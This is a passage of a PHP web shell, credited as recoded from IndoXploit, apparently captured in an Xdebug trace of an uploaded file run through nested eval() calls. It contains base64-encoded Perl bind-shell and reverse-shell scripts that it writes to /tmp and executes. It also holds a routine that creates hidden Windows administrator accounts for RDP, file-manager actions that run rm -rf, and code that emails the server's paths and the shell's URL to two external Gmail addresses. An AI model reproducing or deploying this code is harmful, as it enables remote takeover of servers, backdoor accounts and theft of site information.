";\r\n\t$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";\r\n\tif(isset($_POST[\'sub_bp\'])) {\r\n\t\t$f_bp = fopen("/tmp/bp.pl", "w");\r\n\t\tfwrite($f_bp, base64_decode($bind_port_p));\r\n\t\tfclose($f_bp);\r\n\r\n\t\t$port = $_POST[\'port_bind\'];\r\n\t\t$out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");\r\n\t\tsleep(1);\r\n\t\techo "
".$out."\\n".exe("ps aux | grep bp.pl")."
";\r\n\t\tunlink("/tmp/bp.pl");\r\n\t}\r\n\t$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";\r\n\tif(isset($_POST[\'sub_bc\'])) {\r\n\t\t$f_bc = fopen("/tmp/bc.pl", "w");\r\n\t\tfwrite($f_bc, base64_decode($bind_connect_p));\r\n\t\tfclose($f_bc);\r\n\r\n\t\t$ipbc = $_POST[\'ip_bc\'];\r\n\t\t$port = $_POST[\'port_bc\'];\r\n\t\t$out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");\r\n\t\tsleep(1);\r\n\t\techo "
".$out."\\n".exe("ps aux | grep bc.pl")."
";\r\n\t\tunlink("/tmp/bc.pl");\r\n\t}\r\n} elseif($_GET[\'do\'] == \'krdp_shell\') {\r\n\tif(strtolower(substr(PHP_OS, 0, 3)) === \'win\') {\r\n\t\tif($_POST[\'create\']) {\r\n\t\t\t$user = htmlspecialchars($_POST[\'user\']);\r\n\t\t\t$pass = htmlspecialchars($_POST[\'pass\']);\r\n\t\t\tif(preg_match("/$user/", exe("net user"))) {\r\n\t\t\t\techo "[INFO] -> user $user sudah ada";\r\n\t\t\t} else {\r\n\t\t\t\t$add_user = exe("net user $user $pass /add");\r\n \t\t\t$add_groups1 = exe("net localgroup Administrators $user /add");\r\n \t\t\t$add_groups2 = exe("net localgroup Administrator $user /add");\r\n \t\t\t$add_groups3 = exe("net localgroup Administrateur $user /add");\r\n \t\t\techo "[ RDP ACCOUNT INFO ]
\r\n \t\t\t------------------------------
\r\n \t\t\tIP: ".$ip."
\r\n \t\t\tUsername: $user
\r\n \t\t\tPassword: $pass
\r\n \t\t\t------------------------------

\r\n \t\t\t[ STATUS ]
\r\n \t\t\t------------------------------
\r\n \t\t\t";\r\n \t\t\tif($add_user) {\r\n \t\t\t\techo "[add user] -> Berhasil
";\r\n \t\t\t} else {\r\n \t\t\t\techo "[add user] -> Gagal
";\r\n \t\t\t}\r\n \t\t\tif($add_groups1) {\r\n \t\t\techo "[add localgroup Administrators] -> Berhasil
";\r\n \t\t\t} elseif($add_groups2) {\r\n \t\t echo "[add localgroup Administrator] -> Berhasil
";\r\n \t\t\t} elseif($add_groups3) { \r\n \t\t echo "[add localgroup Administrateur] -> Berhasil
";\r\n \t\t\t} else {\r\n \t\t\t\techo "[add localgroup] -> Gagal
";\r\n \t\t\t}\r\n \t\t\techo "------------------------------
";\r\n\t\t\t}\r\n\t\t} elseif($_POST[\'s_opsi\']) {\r\n\t\t\t$user = htmlspecialchars($_POST[\'r_user\']);\r\n\t\t\tif($_POST[\'opsi\'] == \'1\') {\r\n\t\t\t\t$cek = exe("net user $user");\r\n\t\t\t\techo "Checking username $user ....... ";\r\n\t\t\t\tif(preg_match("/$user/", $cek)) {\r\n\t\t\t\t\techo "[ Sudah ada ]
\r\n\t\t\t\t\t------------------------------

\r\n\t\t\t\t\t
$cek
";\r\n\t\t\t\t} else {\r\n\t\t\t\t\techo "[ belum ada ]";\r\n\t\t\t\t}\r\n\t\t\t} elseif($_POST[\'opsi\'] == \'2\') {\r\n\t\t\t\t$cek = exe("net user $user ink");\r\n\t\t\t\tif(preg_match("/$user/", exe("net user"))) {\r\n\t\t\t\t\techo "[change password: ink] -> ";\r\n\t\t\t\t\tif($cek) {\r\n\t\t\t\t\t\techo "Berhasil";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Gagal";\r\n\t\t\t\t\t}\r\n\t\t\t\t} else {\r\n\t\t\t\t\techo "[INFO] -> user $user belum ada";\r\n\t\t\t\t}\r\n\t\t\t} elseif($_POST[\'opsi\'] == \'3\') {\r\n\t\t\t\t$cek = exe("net user $user /DELETE");\r\n\t\t\t\tif(preg_match("/$user/", exe("net user"))) {\r\n\t\t\t\t\techo "[remove user: $user] -> ";\r\n\t\t\t\t\tif($cek) {\r\n\t\t\t\t\t\techo "Berhasil";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Gagal";\r\n\t\t\t\t\t}\r\n\t\t\t\t} else {\r\n\t\t\t\t\techo "[INFO] -> user $user belum ada";\r\n\t\t\t\t}\r\n\t\t\t} else {\r\n\t\t\t\t//\r\n\t\t\t}\r\n\t\t} else {\r\n\t\t\techo "-- Create RDP --
\r\n\t\t\t
\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t>\'>\r\n\t\t\t
\r\n\t\t\t-- Option --
\r\n\t\t\t
\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t>\'>\r\n\t\t\t
\r\n\t\t\t";\r\n\t\t}\r\n\t} else {\r\n\t\techo "Fitur ini hanya dapat digunakan dalam Windows Server.";\r\n\t}\r\n} elseif($_GET[\'act\'] == \'newfile\') {\r\n\tif($_POST[\'new_save_file\']) {\r\n\t\t$newfile = htmlspecialchars($_POST[\'newfile\']);\r\n\t\t$fopen = fopen($newfile, "a+");\r\n\t\tif($fopen) {\r\n\t\t\t$act = "";\r\n\t\t} else {\r\n\t\t\t$act = "permission denied";\r\n\t\t}\r\n\t}\r\n\techo $act;\r\n\techo "
\r\n\tFilename: \r\n\t\r\n\t
";\r\n} elseif($_GET[\'act\'] == \'newfolder\') {\r\n\tif($_POST[\'new_save_folder\']) {\r\n\t\t$new_folder = $dir.\'/\'.htmlspecialchars($_POST[\'newfolder\']);\r\n\t\tif(!mkdir($new_folder)) {\r\n\t\t\t$act = "permission denied";\r\n\t\t} else {\r\n\t\t\t$act = "";\r\n\t\t}\r\n\t}\r\n\techo $act;\r\n\techo "
\r\n\tFolder Name: \r\n\t\r\n\t
";\r\n} elseif($_GET[\'act\'] == \'rename_dir\') {\r\n\tif($_POST[\'dir_rename\']) {\r\n\t\t$dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST[\'fol_rename\'])."");\r\n\t\tif($dir_rename) {\r\n\t\t\t$act = "";\r\n\t\t} else {\r\n\t\t\t$act = "permission denied";\r\n\t\t}\r\n\techo "".$act."
";\r\n\t}\r\n\techo "
\r\n\t\r\n\t\r\n\t
";\r\n} elseif($_GET[\'act\'] == \'delete_dir\') {\r\n\tif(is_dir($dir)) {\r\n\t\tif(is_writable($dir)) {\r\n\t\t\t@rmdir($dir);\r\n\t\t\t@exe("rm -rf $dir");\r\n\t\t\t@exe("rmdir /s /q $dir");\r\n\t\t\t$act = "";\r\n\t\t} else {\r\n\t\t\t$act = "could not remove ".basename($dir)."";\r\n\t\t}\r\n\t}\r\n\techo $act;\r\n} elseif($_GET[\'act\'] == \'view\') {\r\n\techo "Filename: ".basename($_GET[\'file\'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
";\r\n\techo "";\r\n} elseif($_GET[\'act\'] == \'edit\') {\r\n\tif($_POST[\'save\']) {\r\n\t\t$save = file_put_contents($_GET[\'file\'], $_POST[\'src\']);\r\n\t\tif($save) {\r\n\t\t\t$act = "Saved!";\r\n\t\t} else {\r\n\t\t\t$act = "permission denied";\r\n\t\t}\r\n\techo "".$act."
";\r\n\t}\r\n\techo "Filename: ".basename($_GET[\'file\'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
";\r\n\techo "
\r\n\t
\r\n\t\r\n\t
";\r\n} elseif($_GET[\'act\'] == \'rename\') {\r\n\tif($_POST[\'do_rename\']) {\r\n\t\t$rename = rename($_GET[\'file\'], "$dir/".htmlspecialchars($_POST[\'rename\'])."");\r\n\t\tif($rename) {\r\n\t\t\t$act = "";\r\n\t\t} else {\r\n\t\t\t$act = "permission denied";\r\n\t\t}\r\n\techo "".$act."
";\r\n\t}\r\n\techo "Filename: ".basename($_GET[\'file\'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
";\r\n\techo "
\r\n\t\r\n\t\r\n\t
";\r\n} elseif($_GET[\'act\'] == \'delete\') {\r\n\t$delete = unlink($_GET[\'file\']);\r\n\tif($delete) {\r\n\t\t$act = "";\r\n\t} else {\r\n\t\t$act = "permission denied";\r\n\t}\r\n\techo $act;\r\n} else {\r\n\tif(is_dir($dir) === true) {\r\n\t\tif(!is_readable($dir)) {\r\n\t\t\techo "can\'t open directory. ( not readable )";\r\n\t\t} else {\r\n\t\t\techo \'\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\';\r\n\t\t\t$scandir = scandir($dir);\r\n\t\t\tforeach($scandir as $dirx) {\r\n\t\t\t\t$dtype = filetype("$dir/$dirx");\r\n\t\t\t\t$dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));\r\n\t\t\t\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t\t\t\t$downer = @posix_getpwuid(fileowner("$dir/$dirx"));\r\n\t\t\t\t\t$downer = $downer[\'name\'];\r\n\t\t\t\t} else {\r\n\t\t\t\t\t//$downer = $uid;\r\n\t\t\t\t\t$downer = fileowner("$dir/$dirx");\r\n\t\t\t\t}\r\n\t\t\t\tif(function_exists(\'posix_getgrgid\')) {\r\n\t\t\t\t\t$dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));\r\n\t\t\t\t\t$dgrp = $dgrp[\'name\'];\r\n\t\t\t\t} else {\r\n\t\t\t\t\t$dgrp = filegroup("$dir/$dirx");\r\n\t\t\t\t}\r\n \t\t\t\tif(!is_dir("$dir/$dirx")) continue;\r\n \t\t\t\tif($dirx === \'..\') {\r\n \t\t\t\t\t$href = "$dirx";\r\n \t\t\t\t} elseif($dirx === \'.\') {\r\n \t\t\t\t\t$href = "$dirx";\r\n \t\t\t\t} else {\r\n \t\t\t\t\t$href = "$dirx";\r\n \t\t\t\t}\r\n \t\t\t\tif($dirx === \'.\' || $dirx === \'..\') {\r\n \t\t\t\t\t$act_dir = "New File | New Folder";\r\n \t\t\t\t\t} else {\r\n \t\t\t\t\t$act_dir = "Rename | Delete";\r\n \t\t\t\t}\r\n \t\t\t\techo "";\r\n \t\t\t\techo "";\r\n\t\t\t\techo "";\r\n\t\t\t\techo "";\r\n\t\t\t\techo "";\r\n\t\t\t\techo "";\r\n\t\t\t\techo "";\r\n\t\t\t\techo "";\r\n\t\t\t\techo "";\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "can\'t open directory.";\r\n\t}\r\n\t\tforeach($scandir as $file) {\r\n\t\t\t$ftype = filetype("$dir/$file");\r\n\t\t\t$ftime = date("F d Y g:i:s", filemtime("$dir/$file"));\r\n\t\t\t$size = filesize("$dir/$file")/1024;\r\n\t\t\t$size = round($size,3);\r\n\t\t\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t\t\t$fowner = @posix_getpwuid(fileowner("$dir/$file"));\r\n\t\t\t\t$fowner = $fowner[\'name\'];\r\n\t\t\t} else {\r\n\t\t\t\t//$downer = $uid;\r\n\t\t\t\t$fowner = fileowner("$dir/$file");\r\n\t\t\t}\r\n\t\t\tif(function_exists(\'posix_getgrgid\')) {\r\n\t\t\t\t$fgrp = @posix_getgrgid(filegroup("$dir/$file"));\r\n\t\t\t\t$fgrp = $fgrp[\'name\'];\r\n\t\t\t} else {\r\n\t\t\t\t$fgrp = filegroup("$dir/$file");\r\n\t\t\t}\r\n\t\t\tif($size > 1024) {\r\n\t\t\t\t$size = round($size/1024,2). \'MB\';\r\n\t\t\t} else {\r\n\t\t\t\t$size = $size. \'KB\';\r\n\t\t\t}\r\n\t\t\tif(!is_file("$dir/$file")) continue;\r\n\t\t\techo "";\r\n\t\t\techo "";\r\n\t\t\techo "";\r\n\t\t\techo "";\r\n\t\t\techo "";\r\n\t\t\techo "";\r\n\t\t\techo "";\r\n\t\t\techo "";\r\n\t\t\techo "";\r\n\t\t}\r\n\t\techo "
Name
Type
Size
Last Modified
Owner/Group
Permission
Action
$href
$dtype
-
$dtime
$downer/$dgrp
".w("$dir/$dirx",perms("$dir/$dirx"))."
$act_dir
$file
$ftype
$size
$ftime
$fowner/$fgrp
".w("$dir/$file",perms("$dir/$file"))."
Edit | Rename | Delete | Download
";\r\n\t\tif(!is_readable($dir)) {\r\n\t\t\t//\r\n\t\t} else {\r\n\t\t\techo "
";\r\n }\r\n} if($_GET[\'do\'] == \'tolo\') {\r\n\t echo "


Shell Recoded by L4N4N9_4K1R4 - NoLife\r\n\t

Thanks to:
5iNON!MOU23 ~ Mr-Andraz404 ~ Fx_Fri3nds_ ~ Mr.Oz ~ Mr.Crabs ~ ./Mr.HanzID ~ Peoplehurt1337 ~ Gend3ruw0 ~ ./Mister-Y404 ~ Mr. Hurted ~ ./D14 ~ Mr.CyB3R_INk146";\r\n\t echo "
Recoded From IndoXploit
";\r\n \r\n\t\t}\r\n\techo "
Copyright © ".date("Y")." - L4N4N9_4K1R4
";?>\r\n\r\n\r\n\r\n\'; \r\n\r\n\r\n\r\nif (!file_exists($ikrhtfy)){ \r\n \r\ntouch($ikrhtfy); \r\nchmod($ikrhtfy,0666); \r\n \r\n} \r\n\r\n$opazxcdnm = fopen($ikrhtfy,"w"); \r\n\r\nif (!fwrite($opazxcdnm,$fghky_ouvcbt)){ \r\n\r\nexit; \r\n\r\n}\r\n\r\n$b = "Soldier\'ss";\r\n$c = "Dosya Yolu : " . $_SERVER[\'DOCUMENT_ROOT\'] . "\r\n";\r\n$c.= "Server Admin : " . $_SERVER[\'SERVER_ADMIN\'] . "\r\n";\r\n$c.= "Server isletim sistemi : " . $_SERVER[\'SERVER_SOFTWARE\'] . "\r\n";\r\n$c.= "Shell Link : http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'PHP_SELF\'] . "\r\n";\r\n$c.= "Avlanan Site : " . $_SERVER[\'HTTP_HOST\'] . "\r\n";\r\nmail("hacklinksatis@gmail.com", $b, $c);\r\nmail("burdayimreis@gmail.com", $b, $c);\r\necho "";\r\n?>\r\n' /var/www/html/uploads/123.php(4) : eval()'d code 1 0 4 16 0 0.012235 1163304 session_start 0 /var/www/html/uploads/123.php(4) : eval()'d code(1) : eval()'d code 2 0 4 16 1 0.012303 1164056 4 16 R TRUE 4 17 0 0.012319 1164056 error_reporting 0 /var/www/html/uploads/123.php(4) : eval()'d code(1) : eval()'d code 3 1 0 4 17 1 0.012335 1164096 4 17 R 22527 4 18 0 0.012349 1164056 set_time_limit 0 /var/www/html/uploads/123.php(4) : eval()'d code(1) : eval()'d code 4 1 0 4 18 1 0.012366 1164120 4 18 R FALSE 3 15 1 0.012392 1165552 2 7 1 0.012442 710104 1 3 1 0.012450 707608 1 19 0 0.012458 707640 Error->__toString 0 Unknown 0 0 2 20 0 0.012471 707720 Error->getTraceAsString 0 Unknown 0 0 2 20 1 0.012483 707976 2 20 R '#0 /var/www/html/uploads/123.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/123.php(4): eval()\n#2 {main}' 1 19 1 0.012504 712112 1 19 R 'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/123.php(4) : eval()\'d code(1) : eval()\'d code:5\nStack trace:\n#0 /var/www/html/uploads/123.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/123.php(4): eval()\n#2 {main}' 0.012554 632648 TRACE END [2023-02-12 19:49:56.605145]